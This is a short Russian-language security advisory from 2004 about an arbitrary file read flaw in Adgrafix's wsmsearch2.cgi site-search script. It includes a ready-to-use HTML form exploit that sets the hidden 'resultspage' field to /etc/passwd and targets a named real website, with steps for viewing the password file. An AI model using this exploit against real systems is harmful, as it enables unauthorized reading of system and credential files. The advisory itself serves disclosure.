Дата публикации: | 20.02.2004 |
Всего просмотров: | 1236 |
Опасность: | Низкая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: wsmsearch2.cgi
Описание: Уязвимость обнаружена в wsmsearch2.cgi от Adgrafix. Удаленный пользователь может просмотреть произвольные файлы на уязвимой системе. Данный скрипт для выполнения поиска по сайту берет информацию из скрытых полей html-кода. Вот фрагмент кода: --- <form method=POST action="/cgi-bin/wsmsearch2.cgi"> <B><FONT FACE="Arial,Helvetica"><FONT SIZE=-1>Search Site:</FONT></FONT><br></B> <input type=text name="terms" size=20> <input type=hidden name=boolean value="AND"> <input type=hidden name=case value="Insensitive"> <input type=hidden name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input type=hidden name=faqfile value="/"> <input type=hidden name=resultspage value="="/opt2/sdrforum/httpd/htdocs/results.html"> <input type=submit value="Search!"> ---/opt2/sdrforum/httpd/htdocs/results.html - это путь к файлу, в который выводятся результаты поиска (<input type=hidden name=resultspage value="absolute path to HTML include file">).Если заменить его на /etc/passwd, то вывод результатов поиска произойдет в него. Так можно просматривать произвольные файлы в системе. эксплоит: --- <form method=POST action="http://www.sdrforum.org/cgi-bin/wsmsearch2.cgi"> <B><FONT FACE="Arial,Helvetica"><FONT SIZE=-1>Search Site:</FONT></FONT><br></B> <input type=text name="terms" size=20> <input type=hidden name=boolean value="AND"> <input type=hidden name=case value="Insensitive"> <input type=hidden name=quicksearch value="NO"> <input type=hidden name=max value="50"> <input type=hidden name=faqfile value="/"> <input type=hidden name=resultspage value="/etc/passwd"> <input type=submit value="Search!"> ---сохраняем этот код в html файл, задаем слово для поиска, например, root и смотрим passwd. URL производителя: http://www.adgrafix.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |